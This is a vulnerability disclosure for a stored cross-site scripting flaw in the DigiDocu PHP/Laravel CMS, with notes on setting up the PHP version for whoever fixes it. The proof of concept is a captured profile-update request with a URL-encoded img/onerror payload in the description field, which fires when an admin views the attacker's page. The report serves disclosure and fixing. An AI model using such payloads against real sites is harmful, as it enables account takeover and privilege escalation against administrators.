Cross-site Scripting (XSS) - Stored in harish81/digidocu
Mar 30th 2021
DigiDocu is a CMS written in PHP using Laravel Framework. Laravel uses Blade templating engine which sanitizes the HTML by default. But DigiDocu is trying to render some HTML content without validating the input that comes from the user's profile ie. users can write some HTML using the description field in their profiles. There is a WYSIWYG editor that helps users to write the HTML without writing HTML but then, it still sends HTML behind the scenes which can be easily manipulated.
🕵️♂️ Proof of Concept
As a low privileged user, login and go to
Submit the form while capturing the request in a proxy like burpsuite
Your request should look like:
POST /admin/profile Host: localhost:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 263 Origin: http://localhost:8000 DNT: 1 Connection: close Referer: http://localhost:8000/admin/profile Cookie: [REDACTED] Upgrade-Insecure-Requests: 1 _token=Q4ETEwXTbRdzZZbpvFasb5xdGsIbj5UTRlkZCcKf&name=test&email=test%40test.test&username=test&address=&description=%3Cp%3Etest%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1&btnprofile=btnprofile
description parameter's value with
%3cp%3etest%20%3cimg%20src%3d%22http%3a%2f%2fexample.com%22%20onerror%3d%22alert(1)%22%3e%3cbr%3e%3c%2fp%3e. Now send the request.
The payload now lives at http://localhost:8000/admin/users/2 where 2 is attacker's user id. As soon as the admin opens up the page, XSS alert will pop up.
This vulnerability is capable of stored XSS. This can be utilized to escalate privileges, account takeover and chain with other bugs that can lead to Remote code execution.
For the Fixer
Before you start installing this package, note that this package requires PHP 7.2 which has reached EOL. So the default PHP version might not be 7.2 in your distribution's package manager. So check your PHP's version before continuing.
If you don't have PHP 7.2, Either install PHP 7.2 or bump the PHP version in composer.json to your installed PHP version.
But be cautious with bumping as newer version might not have some functions which might being used within this package. So it is recommended to install PHP instead of tinkering with composer.json. If you have PHP 7.3, its fine to edit composer.json and update the required version to 7.3. If you have updated composer.json, run
composer update to reinstall the latest version.
Whichever PHP version you use, make sure to run all the composer commands from that PHP version ie. if you have PHP 8 but you also installed PHP 7.2, very likely your
php executable points to the 8th version. So instead of running
composer commands directly, you should run composer as
php72 $(which composer) --version
This way composer will see PHP 7.2 and not version 8.
Now you can continue to install this package using these instructions: https://github.com/harish81/digidocu#installation.